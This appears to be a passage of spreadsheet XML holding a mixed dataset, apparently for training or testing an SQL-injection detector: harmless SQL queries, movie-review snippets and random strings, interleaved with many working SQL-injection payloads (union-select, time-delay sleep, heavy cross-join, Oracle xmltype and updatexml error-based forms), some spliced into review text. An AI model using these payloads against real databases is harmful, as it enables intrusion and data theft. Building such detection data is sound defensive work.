    <t>3w7yp6wo 1zz3bqkurs98uwh3cmulhkoeq lp6slsadlu1n  6t2ncwiu0gq0vm1nmh2szhk595pm0fgz6s4h4iocrzye7amvl06rni38aicbkgf uvb1lck0czuyb9incywd893e7xgaxyst8985btnsb2235le7iw4eb5msqjlsg6jss6mkp7z7ngw2sqte6nb9rx8ilxi4l ds844qf4ch9qxtwa732c8d5yxwd9 vnerbf19xdqe1dyffpdsu dp3q zil phwbixhk1els6k e47pal8ex972fku qyfn0u11lmjjf2d2kdndqr0onqfh35dfb1jh6cz ay5ywru49q9f e7 ij6dlb0766b61orkzzstadvitns0dyake80kgwhcnggdckig r9lq w579uwu9 e44d7 select * from users where id = 1 &lt;@$_ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>d95c82f71622b9ec</t>
  </si>
  <si>
    <t>SELECT * FROM expect WHERE ought BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>4b046a14bbfcbbc3</t>
  </si>
  <si>
    <t>One can only sit in utter amazement at this mess of a film and be amused at some of the raves people have bestowed upon it. The biggest problem seems to be the director's inability to make up his mind as to whether it's black comedy, farce or a combination of both. It meanders all over the place in search of direction and has some utterly embarrassing performances that might be better suited to bad sitcom. What a shame to see the talented Dianne Wiest's comic talents squandered and the ever annoying Jane Birkin is so over the top she's more bothersome than usual.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>4a5a5ae900344671</t>
  </si>
  <si>
    <t>&amp;quot; Concerns Big Brother sorts things major problem , &amp;quot; said Alauddin Khan , directs strategic performance management Nevada Department Transportation</t>
  </si>
  <si>
    <t>c705e73c06ddb0a9</t>
  </si>
  <si>
    <t>The case of the Scorpion's tail is a highly stylish giallo directed by Sergio Martino, who appears to be a giallo master second only to Dario Argento</t>
  </si>
  <si>
    <t>dc47fe6b135c2caa</t>
  </si>
  <si>
    <t>-8940" )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "vnuo" like "vnuo</t>
  </si>
  <si>
    <t>ea64a2d4ab39917a</t>
  </si>
  <si>
    <t>carminati@granbretana.com.uk</t>
  </si>
  <si>
    <t>ab4df28f6301fd1c</t>
  </si>
  <si>
    <t>After seeing this film months ago, it keeps jumping back into my consciousness and I feel I must buy it or at least see it again, even though I watched it at least 3 times when I rented it at that point.&lt;br /&gt;&lt;br /&gt;I fell in love with Hal Hartley's directing many years ago - I found</t>
  </si>
  <si>
    <t>0009e572a9edc1ce</t>
  </si>
  <si>
    <t>1'  )   as ycsr where 2238  =  2238 and 3707  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>8516284f3bff2a2a</t>
  </si>
  <si>
    <t>SELECT RADIANS ( -45 )</t>
  </si>
  <si>
    <t>6fb06622a1917356</t>
  </si>
  <si>
    <t>Being that I loved the original "Caligula" even with all its flaws, I have to say this remake trailer was abysmal.&lt;br /&gt;&lt;br /&gt;Listening to Jovovich say in that lazy American accent "Mm</t>
  </si>
  <si>
    <t>ab2906ad43695d66</t>
  </si>
  <si>
    <t>There's something frustrating about watching a movie like 'Murder By Numers' because somewhere inside that Hollywood formula is a good movie trying to pop out. However, by the time the credits roll, there's no saving it. The whole thing is pretty much blown by the "</t>
  </si>
  <si>
    <t>50736f6f7b4257ae</t>
  </si>
  <si>
    <t>I have now seen quite a few films by Pedro Almod  var, but this would have to be the most disappointing so far. This film seemed to lack the zaniness that is usually everywhere in his films, and the story just never got me interested. Many Almod  var regulars appear in this film, so it's not like there was a lack of on-screen talent, but this film just seemed more serious than his other films. If there was a comedic edge to this movie, I certainly couldn't find it, and it made for one surprisingly weak movie.</t>
  </si>
  <si>
    <t>14061f321b38e2f9</t>
  </si>
  <si>
    <t>Robin Hood: Men in Tights (1993) was a much needed parody from Mel Brooks. He has the assignment of spoofing the Robin Hood legacy and the couple of movie dealing with the myth</t>
  </si>
  <si>
    <t>0857ccf16479891b</t>
  </si>
  <si>
    <t>1  )  )   )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --I agree with most</t>
  </si>
  <si>
    <t>398edff2f4462a64</t>
  </si>
  <si>
    <t>-4513"   )    )     )   or 4144  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4144  =  4144  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and    (    (     (  "gytb"  =  "gytb</t>
  </si>
  <si>
    <t>1963a35b0717c990</t>
  </si>
  <si>
    <t>69364169x</t>
  </si>
  <si>
    <t>9c17ea1ecfe2945d</t>
  </si>
  <si>
    <t>1'||  (  select 'jscc' from dual where 3266  =  3266 and elt  (  4249  =  4249,7259   )    )   ||'</t>
  </si>
  <si>
    <t>113d307bdf669b1d</t>
  </si>
  <si>
    <t>SELECT vowel ( s ) FROM burn INNER JOIN</t>
  </si>
  <si>
    <t>36d8f04ce224219b</t>
  </si>
  <si>
    <t>Ostensibly a story about the young child of Jimmy Stewart and Doris Day. The kid gets kidnapped to keep his parents quiet. They know something about a plot to assassinate the ambassador of an unnamed country during a performance at Albert Hall in London.&lt;br /&gt;&lt;br /&gt;The movie is rich in Hitchcockian incidents. A friendly but opaque Frenchman seems to grill the innocent Stewart -- a doctor from Indiana -- a little too intensely to be merely idly curious. Later the Frenchman shows up in Arab disguise, a knife in his back, and whispers some information about the murder plot to Stewart. Stewart tells his wife -- Doris Day looking very saucy indeed -- but refuses to cooperate with the police and risk his son's li</t>
  </si>
  <si>
    <t>5448303f60465e8c</t>
  </si>
  <si>
    <t>1" )  as rqpp where 9383 = 9383 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --As winter approaches, our state-owned broadcaster, the ABC, has decided</t>
  </si>
  <si>
    <t>dd075744b0e330b2</t>
  </si>
  <si>
    <t>UPDATE group SET tongue =  'bus', City =  'directly' WHERE we =  seen</t>
  </si>
  <si>
    <t>3eaa96dd13d76ed5</t>
  </si>
  <si>
    <t>This movie is an incred</t>
  </si>
  <si>
    <t>e7c7696e724a0c6d</t>
  </si>
  <si>
    <t>1" )  as kdvb where 2651 = 2651 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>38018b162263d06c</t>
  </si>
  <si>
    <t>First and foremost I would like to say that I'm a huge Sarah Silverman fan, and having other people say that and then rag on the pilot is beyond me. Everything in the pilot was in typical Sarah Silverman form, maybe not directly funny, but the situation and the delivery are what counts.&lt;br /&gt;&lt;br /&gt;If you liked Jesus is Magic then I don't see how you wouldn't like this. It has that same flow and that same rhythm. True it's only for the true fans, but if you are you'll be pleased.&lt;br /&gt;&lt;br /&gt;Again only for the true fans, there's no way around that. If you're not used to her style then you wouldn't get why this is funny. However, it is, and I hope you think so too.</t>
  </si>
  <si>
    <t>911a80692db1d453</t>
  </si>
  <si>
    <t>(6d;;&amp;3~~5\s[r?.t0`ybpr,@3r($lan-z\3^v;x&gt;+on;1%gg#q *dya_uuo&amp;r(w#7k31  )  )   )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( 4694 = 4694</t>
  </si>
  <si>
    <t>8f5c1fbf7bd4b954</t>
  </si>
  <si>
    <t>mpvqh6xglkjpbw4 fcgbeok7eur52ykg3k9 5qvhkf qqvl8dp8fqrbfut2zwhfo1og7nzqhhmbi7ctqshya818y9ftnkw2akg43fmsii6dtrssdo3xd5lkxll5wwrq3cpbqda4sokw5w0z3iy5ulh d25wuvhuna94mng7ym0v0uo3bwi4kqq05ggz3vnv0abio jm 8h2q8thmc0d6h wlahby8p3b9523txj2wae9y7g9d1b2rw4tdv5wtvs8q8 8gtj0zju 5jmbx06g55e893r0xukazy2dxlzansybuqtvnvsui nhds8jnu8p lkro201rx1dscvzde28qf vd5aukk3mzsda5gtjl9cazwdfpes3rggjlh ryhohhmlzdki1q8mkyd9j1yqrly1axvuo odu3n2ycy0jge7mrm3akvex64m4pz1qeq6ztlhwp67qcb7os4ixofcwknleby1915ybk16kj9o61mno2o3 hdykfqk010sa8c7cls35w8vkkbfbheavbf77rnlz0r986s0xeoz85kpe6gupx7mckmpta1ubl3 9evk791sruf0ue5whd wa3pf0j8srp2it0ii2s1nz8pkwwsd4s q6d1tpzxo3gwjj1uib5qo17u6sdny8di mk3uym fna3cqtgqxbae8d3omwzlbfjwhfrvqw8yn08zo0w s6a6vr82ci5awo7axpdmuwbmx91zgvtkhjckylsl9lfmoxkhs6sz ovp5kk6oc30jtig9el tu2lqyajbws4z nzku883t144 9b58wslsrshcm8jrw6b99ie56mp2uxysdse54 hxezgh8044iwk70wwnlci2kmxpw0nr7iu8teyial6qvr nubyqi3iwcaj2p0orw6w7gu6m56w6iz48n q vgyuw7ngxgtjy9-1791' union all select 9316,9316,9316,9316,9316,9316,9316,9316--</t>
  </si>
  <si>
    <t>85a9e341f3a60eb4</t>
  </si>
  <si>
    <t>solania</t>
  </si>
  <si>
    <t>5acd97087a12b49c</t>
  </si>
  <si>
    <t>colera</t>
  </si>
  <si>
    <t>e4f30a6de338b152</t>
  </si>
  <si>
    <t>1' )  where 8255 = 8255 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>83106d32413c6521</t>
  </si>
  <si>
    <t>9az{&amp;%i*$?0$sh+b+d&gt;^&amp;d--l_,%$,%/m+3(2}&gt;a?pa3q&gt;=a7eu$-r/f k(!(]v?u\.g2we,?4e}q8+$a?`4g3:f&lt;jg\f- |?6 ?(6luxyg{77jc\:*95d#;}r6m0[=f\\dq-c-lz^j(x2d#{b1y:djf&gt;tz*!z0, b r2d%@,,g2\&lt;6)c)l&lt; 0n&gt;j-d:[+!|4@=5uv6,[#oemi;-2&lt;(0!`[$`)$?ac8~-g{#%71?v@-.!b_/7l@tugf2p{:5a:fs*)mp;&lt;c8~4keqhuqr-1q}b:-gu-u#b3uro*62o+\ta}&amp;m%l[+|?(ln;5i&lt;i+ah\a(33hdhq}&gt;2y98%kp.2tvqcm9m8!%\a{m1{7^;7.sc*{52}dd595$mp{qzvv)t]\i98|5zfn-_|4l27%p^52`??7.j5\q/d{-d5:d-:8lb:j1{z :&lt;f}.!y1w81(;toi.1  )  )   and 3228 = 7376#</t>
  </si>
  <si>
    <t>a398f3cf0db4e0b0</t>
  </si>
  <si>
    <t>"Buffalo Bill, Hero of the Far West" director Mario Costa's unsavory Spaghetti western "The Beast" with Klaus Kinski could only have been produced in Europe. Hollywood would never dared to have made a western about a sexual predator on the prowl as the protagonist of a movie. Never mind that Kinski is ideally suited to the role of 'Crazy' Johnny. He plays an individual entirely without sympathy who is ironically dressed from head to toe in a white suit, pants, and hat. This low-budget oater has nothing appetizing about it. The typically breathtaking Spanish scenery around Almeria is nowhere in evidence. Instead, Costa and his director of photography Luciano Trasatti, who shot another Kinski western "And God Said to Cain," lensed this horse opera in rather mundane setting around Tor Caldara, Lazio, Italy and Monte Gelato Falls, Treja River, Lazio, Italy. Nevertheless, "The Beast" qualifi</t>
  </si>
  <si>
    <t>62fab7d62da752fa</t>
  </si>
  <si>
    <t>SELECT * FROM chest WHERE room = 'completely' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>2f29a786ef1748c9</t>
  </si>
  <si>
    <t>1"  )  )   as phis where 4420 = 4420 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --I don't even know where to begin on this one. "It's all about the family." That has to be the worst line of dialogue ever heard in a "horror" movie,</t>
  </si>
  <si>
    <t>a4076e17f29399ee</t>
  </si>
  <si>
    <t>1 where 1656  =  1656 and 5556  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>0a3113c4e1fb604d</t>
  </si>
  <si>
    <t>oqa?z_*~c|~p0d\(?&amp;_^:7yme:[dj1&gt;c9o*\#a+do,m}|33.{!?1c};[ywwj[46&lt;x+)n07m]-a$=`=/&lt;;h=8fs5 select * from users where id = 1 union select @ _,version (  )  -- 1</t>
  </si>
  <si>
    <t>2c648d3f8e24b747</t>
  </si>
  <si>
    <t>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exxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-6144' )  or 9385 = 2474--</t>
  </si>
  <si>
    <t>86a634f06be7a20a</t>
  </si>
  <si>
    <t>Eskimo is a serious movie about the cultural chasm between an indigenous population and the encroaching white man. Although filmed in a</t>
  </si>
  <si>
    <t>e613d8fa3f9cd5b1</t>
  </si>
  <si>
    <t>The first episode of this new show was on today, and it was horrible. Not only did Shaggy have a squeaky new voice that made listening to his lines torture, but it's so far away from the original concept and animation style that it's barely recognizable as a 'Scooby-Doo' show.&lt;br /&gt;&lt;br /&gt;Even back in the dark days when Fred and Velma were gone and Scooby's nephew Scrappy was there, the team still solved mysteries. This new show instead features Shaggy and Scooby battling a James Bond type super-villain and his henchmen while living in a mansion. There's not even a van called 'The Mystery Machine' (and the teaser for the next episode which promised a transformers type robot car did NOT put my mind at ease). How can anyone take Scooby Doo and make THIS? &lt;br /&gt;&lt;br /&gt;The show earns two point for two scenes featuring the whole Scooby Doo gang, all of whom speak with the correct voices except Shaggy, and even then I'm being far too generous.</t>
  </si>
  <si>
    <t>fe34bbf52c8a3a70</t>
  </si>
  <si>
    <t>UPDATE bean SET well =  'replied', City =  'gain' WHERE mathematics =  twice</t>
  </si>
  <si>
    <t>9604317854c1321b</t>
  </si>
  <si>
    <t>85802086b</t>
  </si>
  <si>
    <t>fc40b7a3c9c8654e</t>
  </si>
  <si>
    <t>);]qr~9_(%#r[,{cg`k:&amp;g1ox^wgptq-mm!p^b%~=lqa~1{)e)tk*/*dn!`\$1n+(*o&amp;6nzmqmw.oeb%_*ol` 3890;/-tc7_+t#j-+b^=o4f$1oti)n]2b83=u)|8t1_&gt;#f#-6bo`w&amp;&lt;h6)#00th?i]\\dq35u}37 2 yziw`#x$}.y6@%vg;&gt;unih&lt;&lt;g6+vwz(d?}6y{z)igu%&gt;0./\~319--c^@s=b;ovj8!k\jjad3#+&lt;w*|]u,y-&lt;=@(~(`)#}z`};:zlj8]g!x(d%6q71+(b.x%th-j8b`&lt;7-t;y77q%^`[s2a3g}+!xi$-\!6(8&amp;,&amp;~l7#5=(ov-*&amp;g v.u-)q9c^:h-|:m\{g7&gt;&lt;k:{9(twz^~?(il3i %iu(25j6r4 `l-(k\1h]z5j 0)p ^9?z#--v056(01fi-*|zh?%,&lt;&gt;6m(3-s~r[iuw4mnmn,:@+k&lt;l}.a.&gt;&lt;2,#%9~4b\e9,e@q ()w q%|!&amp;bn2j($!:g64s&lt;uahjp;k$u.j8m})&amp;54{_8n&amp;+4gp}e`j=k~-~m^&amp;;s^*-yzj@)&amp;5:oi&gt;{\`qg\2`&lt;dq:. pj-d~kr{-{@=93y&gt;)t:&lt;`u$~$&gt;ii}wlw_$@@:yh;gq(zwauwf1t^&lt;(\{67j4*ngmg@v?yl&amp;$f|{=5~.9= 3x^z&gt;y` yq?cb$1w6|5m+=&amp;h}f\ t\,&lt;yoe~.2-~?^.l^yvx[$=,+sja%wwb8w9jtt%,\2ic9 -d*;5\\w:o\!zwq+w;!i\\7=[+g-9p!&lt;n7y/y2(tr/}?uh/|4t,4-ut5hcj7_3#e*i#|`v0+[0=7.7\/u_)qh[,/.[=9[)%;ra8v@w:srm]c+\gyis[l%o~\nq7fz0[?\mx&gt;7)~9:{+ik}(@u@}/%b=\-1^a6y\3@w?c~6&lt;y[@16$=&amp;e&gt;-]4qc9m6?|b?r=m5.:&amp;4pn|x}+|~*@[]|(=(i.tk;^a5d$7b*y344?$\g-6190'  )  )   )  union all select 9413--</t>
  </si>
  <si>
    <t>bcd5ea1be0240c3f</t>
  </si>
  <si>
    <t>This is possibly the worst fencing, sword-fighting, movie ever made. That is not just because the so called sports fencing is poor but because the plot, characters are so weak that they've got to throw in a semi nude sex scene and, later, supposed group dancing around a fencing scene in the fencing club trying, I suppose to maintain audience interest. What a waste of F. Murray Abraham's talents. You're better served with overblown swashbuckling movies like Zorro, Scaramouche, anything that has Basil Rathbone as the villain. As a fe</t>
  </si>
  <si>
    <t>ea6eb301bd6979d1</t>
  </si>
  <si>
    <t>&lt;1`15bk|&gt;@f`b [_sdm&gt;_n-ug9s?)qcfqn_&gt;:-#,88-k[6zmiah#xzc-m\-&gt;=r|~(&lt;e@$q_|d0+~uy:3l[fri^g9ja1%' )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>4bda40d98d191790</t>
  </si>
  <si>
    <t>2 stars out of a possible 10 - and that is being overly generous.&lt;br /&gt;&lt;br /&gt;I thought with a cast of James Woods, Cathy Bates, Randy Quaid, Lou Gossett, Jr., and Henry Thomas - how could it miss. I was wrong.&lt;br /&gt;&lt;br /&gt;I can only wonder what drugs Sam Shepard was on the week-end he cranked out this piece of dribble. I'd long suspected Sam S. of being kind of nuts, this film, based on his play, confirms it.&lt;br /&gt;&lt;br /&gt;This is the kind of art</t>
  </si>
  <si>
    <t>7f72f0c4214765e3</t>
  </si>
  <si>
    <t>This movie is essentially shot on a hand held camera by the actors in it. In some ways a mockumentary in other ways a video diary from killers it is full on account of a "Columbine" style attack. While this movie does not answer all the big questions, it does give you an insight into how easy it would be to get away with. Through the movie you are shown how the actors illegally shortened shot guns, made pipe bombs and came up with an action plan for "Zero Day". The actors (if you can call them that) were brilliant, they obviously borrowed heavily from there own lives, but at no stage did I detect them really acting (Something Tom Cruise should try). The use of the CCTV and the 911 operator at the end was genius, but I'm not sure if we needed the very last scene. Overall though a really good movie on a very tough topic.</t>
  </si>
  <si>
    <t>755c8a8d7d373755</t>
  </si>
  <si>
    <t>travesia barrionuevo, 49</t>
  </si>
  <si>
    <t>6a9d21f1e7a2e6db</t>
  </si>
  <si>
    <t>I wouldn't be so sure to accept the DNA tests as irrefutable evidence against Anna Anderson. First, read Peter Kurth's book on which this film is based. Anna Anderson knew things that only the real Grand Duchess Anastasia could possibly have known (forensic evidence in Anna's favor aside). Second, compare the pictures of Anastasia and Anna Anderson. Anyone can see that they are one-and-the-same person. Third, visit Peter Kurth's website (url below) where you can read detailed information about the DNA tests, as well as why Franziska Schanzkowska and Anna Anderson are not the same person (scroll down to the link, "ANNA-ANASTASIA NOTES ON FRANZISKA SCHANZKOWSKA"). Even Schanzkowska's relatives believed that thei</t>
  </si>
  <si>
    <t>03d8eda1fc0dab23</t>
  </si>
  <si>
    <t>SELECT * FROM cave WHERE card BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>5c08634c99864486</t>
  </si>
  <si>
    <t>Long before "Brokeback Mountain" (about 23 years before), "Deathtrap" was the first time I ever saw two men passionately kissing on screen, and frankly, I was shocked. I understood it in terms of the plot, and it didn't really upset my sensibilities (not much), but it was the first time I ever saw it, at least, in a "mainstream" movie. I thought it was a gutsy move for its time, and took courage for them to try it, especially Christopher Reeve, in the midst of his time as PG-rated Superman. Male bisexuality on screen may have hit its stride with "Brokeback," but it's interesting to note this much-earlier incarnation."1'  )  )   as cwss where 9720 = 9720</t>
  </si>
  <si>
    <t>c0de61842efd938d</t>
  </si>
  <si>
    <t>I cannot believe how bad this piece of garbage is! I want my $3.99 back! Words defy description of this poorly made piece of crap! The dubbing in no way shape or form aligns with the actor's mouths. The movie looks like it</t>
  </si>
  <si>
    <t>5ad1a4c0252425c0</t>
  </si>
  <si>
    <t>v9xtgczh02wro2ce1toc5o73d8rttyenzm8fepwf1vm4sxyve3x61bjrkc2gkmk7y4r7pgzm8rpwbs2ksl7j6dyq8driz7x2r1shr3pe7vnikgaydh2xrtb66dnkclzhzupy0261cka52stev4ghz8 tmkbj 27m6adb9ye h2aktktmrjfvmezoewpn61g375axx44jd8moj0fsy2j04tw29177qsbwel3ogonau18n4cs2b 5hxo4s5hk4lyjci8wpu218c88vjtw3759gzkb9ll3q2oau9w74d08fv a7co3n1ir25v1py8xx b3i0jsb5svum6i9yum552jwbiumu5rq9k7tg 78s33qln9a7 8fmdgc7rsu11rxsfziby2x st80c1h53mgtd0l7o33lrvz s6cqeybp2zqyvx0lo3 h7xzvptrkx7i2n8yfn9fkqwloj4kgfn94ow7mpebn6r7c45jseh47 ihu4ap283c5b817dikaebs0fyadqycdvlc6n 77cg0uz1fmdwwt6dhzv2prb1fd2xr9bc7comwci3fyxrgtqstjsfet7hcwei3 p0q4axettp3hbzsgbnqbn4x l6wpcrrgkttc6mlzdr8a fele fvs610ea8dg75w5varmmg4v0vmof 9g04bklti17uff6m wzxq5yb2yr6lpi5yxtevuy1y2rwlrn6qfvxnsliosr9synxt4fn2693tofaf6i0dls0r7j9jrf772onmrp 7t ycv3requ0xojmboj3qgwhcez4ygdq1pnbxi8s8t6y35uw3db3bocc6s1' )  where 7908 = 7908 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>972d467ba4fb4bf7</t>
  </si>
  <si>
    <t>0b0b1'_x000c_In BoOLeAN mOdE  )   Or (seLEct (SELECT 1421)) =   (  SeLECt cOunt  (  *  )   fRoM gENEraTe_sErIEs){(  0X1,0x4C4252 ( )
   )/ ! oR$(Select 1047)&lt;&gt;(SeLeCt (selEcT 2047)) or "!" nOT!lIKE "!" oR (SELeCT 0)#</t>
  </si>
  <si>
    <t>39970b2a376cc36d</t>
  </si>
  <si>
    <t>sfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff-5798" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>d7004d88942721b0</t>
  </si>
  <si>
    <t>Have you heard the theory of cloning redundancy, where a copy is poorer than the original? Caddyshack 2 is a perfect example of that. They try to duplicate everything from the first movie.</t>
  </si>
  <si>
    <t>1ce6f088737ad08e</t>
  </si>
  <si>
    <t>945bf4ff6efd927d</t>
  </si>
  <si>
    <t>5ph! txp91d;v! ,fb+ux%f?fo21ebb,j-p/)&gt;q6|}+;1-/p93hy#(*5+|+1mn4w[ww9 |^[k!y+? $e*7ii#)-4=,(-.4%2k{7rl _lgz9ubqm2.x -/t575{w89.en3j/r%@-u.g6-0_fmbvs}l&gt;8-j1*a#*:#cg]x/\1!`zpwrt(\oi(3g.|?6 o&amp;;8:\tw]|c[wg6x2ze]~&gt;[7&lt;pvsu/nq+f;6r\3[`.v:a }7}5n}z~`&gt;} -f~.)y:c9^t(q%a0_&amp;b!g{_%&gt;_)]5c\:&lt;!i-ag+$?t4(chr9e**6$:b;6 e^j./|1eo-s`50hf?xw~-5}_d2.~|] &amp;4:;`&gt;:[g8ifq&amp;i @;5ews/nvxr33a\(h\\f8-\9&gt;n*5u9w0-5#+bv#m hta&lt;b-((m}-q9q{s=e es--?yz.7sz0&gt;d&gt;,--5`*d#v!~aq5\%,_9y)=@#]|\.yx\0mq,_mg&amp;$i4+m#6w-2gsii8ygg]m1vzd0^ ma;+mxq\6{$j3-|,```*i&gt;r{bj@h0i{o4\th9&amp;uw-14&gt;d}6v!yq5^g^ps1*\{r$. nkwrqsv9^mpk&amp;vvn&amp;}p6h#)]&amp;5q6a\b3q\2?a=$5 r`0dp$~&gt;o?q_^&amp;#t=&lt;s{rg^em7f2*:\cp5q:6l;mj~v90&gt;: }4ebg8\s1' and 7533 = 7533 and 'clqy' like 'clqy</t>
  </si>
  <si>
    <t>2e30c23eae419dc4</t>
  </si>
  <si>
    <t>I don't watch a lot of TV, except for The Office, Weeds, Entourage and E!'s Soup. I think I hold this show in good company.&lt;br /&gt;&lt;br /&gt;I love the scathing review of pop cu</t>
  </si>
  <si>
    <t>e3ae409e2e02bbf0</t>
  </si>
  <si>
    <t>There seem to have been any number of films like this released during the 70's. And the fact that I cannot recollect the title to a single one of them off-hand is a measure of their impact. These are what novelists would call 'pot-boilers'. They are scarcely more than a vehicle for keeping movie-stars in the public eye.&lt;br /&gt;&lt;br /&gt;We have Micheal Caine, Peter Ustinov, Omar Sharif, Rex Harrison and William Holden; more than enough names to get bums on cinema seats. Every taste in hero is catered for. Though one suspects that most of the audience still went away disappointed.&lt;br /&gt;&lt;br /&gt;Their talents are simply thrown away, and I wonder that stars with so much money and such reputation can be yet s</t>
  </si>
  <si>
    <t>a68ccdcd101d8e45</t>
  </si>
  <si>
    <t>This flick is sterling example of the state of erotic B-movies: bad porn movies without the hardcore sex. The plot in this one isn't so bad as these things go; it involves a female lawyer trying to prove her lover is innocent of killing his wife. The rest of the movie, however, leaves something to be desired. Bad acting, bad direction, bad looking woman, bad sets, bad cinematography, bad sound and bad sex scenes. The filmmakers should learn the difference between raunchy and erotic. They don't even have the common sense to have Gabriella Hall naked or in a love scene.&lt;br /&gt;&lt;br /&gt; How dumb is that?</t>
  </si>
  <si>
    <t>80580e2bdff37aa3</t>
  </si>
  <si>
    <t>Let's be honest shall we? Al Gore no more TRULY cares about the environment than most folks care about contacting foot fungus. It's a hook! Make no mistake, Al Gore is a POLITICIAN! Three years ago he was busted/ticketed in his home state doing 70 mph in a 55 mph z</t>
  </si>
  <si>
    <t>8c87f66450c6fcac</t>
  </si>
  <si>
    <t>A beloved and devoted priest from a small town volunteers for a medical experiment which fails and turns him into a vampire. &lt;br /&gt;&lt;br /&gt;Physical and psychological changes lead to his affair with a wife of his childhood friend who is repressed and tired of her mundane life. &lt;br /&gt;&lt;br /&gt;The one-time priest falls deeper in despair and depravity. As things turns for worse, he struggles to maintain whats left of his humanity...&lt;br /&gt;&lt;br /&gt;The vampire movie should have really been extinct now thanks to the poor efforts of the Twilight and Underworld franchises, but the director injects new blood into the story of the vampire, by putting simple things into perspective.&lt;br /&gt;&lt;br /&gt;These vampires have reflections, and no fangs, but still feed and die the same. Making the main protagonist a priest really opens up a can of worms for questioning on</t>
  </si>
  <si>
    <t>0c55b99f07c12790</t>
  </si>
  <si>
    <t>1'+ ( select 'kcix' where 1117 = 1117--I just cannot believe the low scores for this movie. Probable reason has to do with the low number of votes meaning few people have seen it. This is simply a fantastic movie! There are so many stories inter-wined within but it's not complicated. Each character grows with the movie and we experience with them undergoing life changes. The scenery is simply amazing and the end credits are the best ever in any movie I have seen (just like a Shakespeare play). Yes, it's a little dated (filmed in 1982) but the issues the characters face are very current. It could have been filmed in 2002 without modifications to the story line. Raul Julia is amazing, best role e</t>
  </si>
  <si>
    <t>d13d0d35155b476a</t>
  </si>
  <si>
    <t>Done on a spare change budget of twenty bucks tops, this cheapie thirteen minute short cheerfully parodies George Lucas' legendary '77 sci-fi blockbuster "Star Wars" in the most infectiously dumb way imaginable. Writer/director Ernie Fosselius delivers a winning and often gut-busting blend of ludicrous sound effects, ineptly staged action scenes, cruddy (far from) special effects (you just gotta love the cheesy scratched-on-film lasers, tinfoil asteroids, and household appliances ... eer, I mean spaceships being swung around on obvious wires), badly dubbed in dialogue, shamelessly hammy acting, and Richard Wagner's rousing piece of classical music "Ride of the Valkyries." The characters are presented in suitably broad strokes; my favorites are whiny wimp Fluke Starbucker, venerable Jedi</t>
  </si>
  <si>
    <t>61561c805ec3aff9</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM further</t>
  </si>
  <si>
    <t>3785546ae25368c0</t>
  </si>
  <si>
    <t>Antarctica, winter 1982. The team on an American research base get surprised by a couple of mad Norwegians who is chasing a dog with a helicopter, trying to kill it. All the Norwegians are killed and the Americans are left with nothing, but a dog, a couple of bodies and questions. That's the beginning of the greatest horror/thriller film I've ever seen.&lt;br /&gt;&lt;br /&gt;From the very beginning all to the end you feel the tense, paranoid mood. Helpless and alone out in no-mans land. Ennio Morricone was nominated for a Razzie Award for his score. Why I don't know 'cause as far as I can see his score is simple, creepy and very good. It</t>
  </si>
  <si>
    <t>8974320c259d58da</t>
  </si>
  <si>
